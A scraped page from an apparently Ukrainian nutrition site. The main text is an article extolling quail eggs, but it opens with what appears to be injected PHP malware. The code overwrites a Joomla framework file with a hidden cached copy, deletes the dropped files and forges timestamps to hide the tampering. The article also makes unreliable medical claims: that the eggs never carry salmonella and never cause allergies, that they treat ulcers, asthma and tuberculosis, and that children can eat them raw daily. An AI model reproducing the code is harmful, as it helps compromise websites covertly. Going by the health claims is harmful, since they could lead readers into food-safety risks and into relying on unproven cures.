$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Перепелине яйце - фантастичні властивості | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Перепелине яйце - фантастичні властивості

yajco_perepel

Перепелине яйце - найцінніший продукт. Воно володіє антибактеріальними, імуномодулюючими, протипухлиними властивостями. Перепелині яйця містять безліч мікроелементів і вітамінів, і все це - при повній відсутності в них холестерину!

У порівнянні з курячим яйцем в одному грамі перепелиного міститься більше вітамінів: "А" - 2,5 рази, "В1" - в 2,8 і "В2" - в 2,2 рази. Вітамін "Д" міститься в перепелиних яйцях в активній формі, він перешкоджає розвитку рахіту.

У перепелиних яйцях в порівнянні з курячими в 5 разів вищий рівень фосфору і калію, в 4,5 рази - заліза. Як відомо, фосфор сприяє розумовому розвитку. Тому перепелині яйця корисно включати в раціон всім, особливо дітям . У Японії, наприклад, де давно і всебічно досліджені корисні властивості перепелиних яєць, кожен школяр щоденно обов'язково отримує два таких яйця в обід.


Завдяки фосфору, перепелине яйце також є хорошим стимулятором потенції. Значно більше, ніж у курячих, в яйцях перепелів міді, кобальту, інших амінокислот. За вмістом таких незамінних амінокислот, як тирозин, треонін, лізин, гліцин і гістидин, перепелині яйця перевершують курячі. Тирозин, як відомо, відіграє значну роль в метаболізмі і сприяє формуванню пігменту, що обумовлює здоровий колір шкіри. Ось чому перепелині яйця використовуються, зокрема, в косметичній промисловості.

Яйця перепелів відрізняються підвищеним вмістом лізоциму, а ця речовина поповнює свій ендогенний запас, нормалізує мікрофлору. Поряд з цим лізоцим перешкоджає розвитку в яйцях небажаної мікрофлори, і вони тривалий час зберігають свою свіжість в кімнатних умовах.

У перепелиних яйцях ніколи не буває сальмонели. Це викликано тим, що у них дуже міцна подскорлупная оболонка і невеликі дихальні отвори в шкаралупі, які запобігають проникнення хвороботворних бактерій.

Завдяки високій температурі тіла (42С), перепілки стійкі до інфекційних захворювань. Це дозволяє утримувати їх, не вдаючись до вакцинації, що виключає накопичення в організмі та яйцях лікарських речовин.

На відміну від курячих, яйця перепелів не викликають алергію у дітей та дорослих. Навпаки, присутній у них білок овомукоід здатний пригнічувати алергічні реакції, тому на їх основі виготовляється медичний препарат (овомукоідний екстракт) використовують для лікування алергії. Овомукоідний екстракт виконує функцію постачання пацієнтів додатковим інгібітором трипсину, якого їм не вистачає в силу генетичних причин.

Перепелині яйця можна і навіть бажано вживати сирими для збереження в них багатьох поживних речовин, які можуть руйнуватися при обробці продукту.


Вживання в їжу перепелиних яєць дає прекрасні результати в лікуванні гастритів - виразкової хвороби шлунка та дванадцятипалої кишки, а також панкреатиту.

Лікувальні властивості

Перепелине яйце вживається не тільки в їжу. Поєднання комплексу біологічно активних речовин з високим дієтичними якостями дають можливість використовувати перепелині яйця в медичній практиці.

Про ефективність застосування перепелиних яєць у дієті хворих знали ще в глибоку давнину. Доцільно включати сирі перепелині яйця в дієту хворих і ослаблених дітей.

На базі клініки дитячих хвороб Московського медичного інституту і в інших медичних установах перепелині яйця випробовували в комплексі лікарськими препаратами на хворих бронхіальною астмою, хронічною пневмонією, туберкульозом. Були отримані позитивні результати. Відзначалися також поліпшення апетиту у дітей, надбавка у вазі і нормалізація рівня гемоглобіну та еритроцитів у крові.

Спостереження, проведене фахівцями ПНС "ПЕРЕПЕЛ" спільно з працівниками Вітебського облздраву, підтвердили ефективність застосування перепелиних яєць у медичній практиці. Яйця включали в дієту дітей, які зазнали впливу радіації під час аварії на Чорнобильській АЕС. Через певний проміжок часу у них покращився загальний стан, підвищився рівень гемоглобіну, нормалізувався ШОЕ, зникли головні болі, стомлюваність. Біохімічний аналіз крові не виявив відхилень у її складі.

Отримані результати дозволили зробити висновок, що перепелині яйця бажано використовувати в лікувальному харчуванні ослаблених дітей і дорослого населення, і в першу чергу в екологічно неблагополучних зонах. Дітям дають від 2 до 6 шт. на день залежно від віку, а дорослим - по 4-6 яєць щодня вранці натщесерце. Їх корисніше вживати сирими, запиваючи гарячою водою. Прийом повинен бути систематичним, без перерв протягом 3-4 міс. Вже через два тижні починає проявлятися їх благотворний вплив на організм.

Перепелині яйця - один з найбільш сильних стимуляторів потенції. Болгари навіть винайшли спеціальний коктейль, який називається "Молодість". Перемішуються 120 г коли, 20 г коньяку або рому, шматочок лимона, чайна ложечка цукру і 2 свіжих перепелиних яйця. У суміш додається газована вода. Ефект від вживання чарівного напою приголомшливий, стверджує болгарська газета "24 години".

 
Харчування-здоровий спосіб життя Перепелине яйце - фантастичні властивості